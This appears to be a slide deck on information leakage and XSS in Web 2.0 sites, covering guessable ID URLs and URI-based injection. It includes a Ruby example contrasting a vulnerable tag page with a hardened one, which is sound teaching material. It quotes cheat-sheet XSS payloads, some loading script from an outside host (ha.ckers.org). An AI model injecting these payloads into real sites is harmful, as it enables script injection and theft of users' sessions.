INFORMATION LEAKING 2.0 / About Me / User Experience
INFORMATION LEAKING 2.0
About Me
• Occupation: web engineer
• Side job: blogger
• Specialties:
• User Experience Research
• Website QA/QC
INFORMATION LEAKING 2.0?
Web 2.0?
Two things for sure...
• SNS: Social Network Service
• UGC: User Generated Content
More Than That...
You shouldn't design it this way
• http://xxx.com/pages/profile/?userid=1234
• http://xxx.com/user/show/5678
Makes life easy for the bad guys :)
Convention over configuration
• ActiveRecord
• id -> primary key
• Scaffold
• every function -> /show/id/
• Books / Guides
• Everyone starts as a beginner, and beginners only know how to copy what the book shows
• Tw*t**r.com
• F*****ds.*oo*o.com
• My.S**ce.com
• Mini**orld
• C*world
• more..
As long as you can write...
• a for loop
• an HTML parser
• an XML parser
• a JSON parser
SQL Injection
XSS
More...
Mainstream script types
• HTML
• JavaScript
• VBScript
• ActiveX
• Flash (the hardest to defend against)
Also Possible...
Code Example (2)
http://HOST/PATH/[XSS]
• GET / POST / Cookie (GPC)
• Must be specifically filtered before use
• A new Web 2.0-era artifact: tags (mostly passed via POST / GET)
• Parsing the URI (pathname / filename) -> tag
• Developers overlook that this is external data that may have been tampered with
• A malicious attacker can craft a URI containing special syntax to attack
Examples..
• http://HOST/[XSS]/FILENAME.php
• http://HOST/PATH/[XSS]/php
• http://HOST/PATH/FILENAME.php?[XSS]=VALUE
• http://HOST/PATH/FILENAME.php?PARAMETER=[XSS]
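The "parsing URI -> tag" pattern above, as an added Ruby example (not from the slides; Ruby because the talk's conventions come from Rails): a tag page that reads the tag name from the request path, first in the vulnerable form where the path segment is trusted, then hardened with an allowlist and HTML escaping. The route layout http://HOST/tag/<tag>, the function names and the TAG_FORMAT pattern are assumptions for this example.

```ruby
require "uri"
require "cgi"

# Pull the tag out of a request URI laid out as http://HOST/tag/<tag>.
# The route layout is an assumption for this example.
def tag_from_uri(request_uri)
  path = URI.parse(request_uri).path          # query string and fragment are dropped
  segment = path.split("/").reject(&:empty?).last
  return nil if segment.nil?
  URI.decode_www_form_component(segment)       # undo the browser's percent-encoding
end

# Vulnerable form: the path segment is treated as trusted and interpolated into HTML,
# exactly the mistake the slide describes.
def render_tag_page_unsafe(request_uri)
  "<h1>Tag: #{tag_from_uri(request_uri)}</h1>"
end

# Assumption: what a legitimate tag looks like on this site.
TAG_FORMAT = /\A[[:alnum:]_-]{1,32}\z/

# Hardened form: treat the segment as external data. Reject anything outside the
# allowlist (caller answers 400/404 on nil) and HTML-escape on output, so a later
# relaxation of TAG_FORMAT cannot reintroduce script injection.
def render_tag_page_safe(request_uri)
  tag = tag_from_uri(request_uri)
  return nil unless tag && tag.match?(TAG_FORMAT)
  "<h1>Tag: #{CGI.escapeHTML(tag)}</h1>"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample request: the [XSS] placeholder from the slides,
  # percent-encoded the way a browser sends it in the path.
  hostile = "http://HOST/tag/%3Cscript%3Ealert(1)%3C%2Fscript%3E"
  puts render_tag_page_unsafe(hostile)   # the script tag reaches the page
  p    render_tag_page_safe(hostile)     # nil: request rejected
  puts render_tag_page_safe("http://HOST/tag/web2-0")
end
```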
• google:// complete list of XSS test strings
• google:// XSS Cheat Sheet
• Image XSS using the JS directive
• <IMG SRC="javascript:alert('XSS');">
• No closing script tags
• <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
• Double open angle brackets
• <iframe src=http://ha.ckers.org/scriptlet.html <
• BODY tags
• <BODY ONLOAD=alert('XSS')>
• <SCRIPT> allowed but <SCRIPT SRC> not allowed
• <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
• Hard to defend against...
• <SCRIPT>document.write("SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Ajax
• Asynchronous JavaScript And XML
Advantage of Ajax
• JavaScript running on the client reduces bandwidth and processing demands on the server
• Well-designed code that is truly asynchronous also gives the server more time to respond
• Which is smoother, faster, and preferably as intuitive as any desktop application
Advantage of Ajax + XSS
• JavaScript running on the client reduces bandwidth and processing demands on the server
• Well-designed code that is truly asynchronous also gives the server more time to respond
• Which is smoother, faster, and preferably as intuitive as any desktop application
Ajax + XSS is...
• Samy Worm
Why it is hard to defend against, reason four
• We can only rely on
• IDS / IPS
• Vulnerability scanner
• Source code analyzer
• but they are all expensive